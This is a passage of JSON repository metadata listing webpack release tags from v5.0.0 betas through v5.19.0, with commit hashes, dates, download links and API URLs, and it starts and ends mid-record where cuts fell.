Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/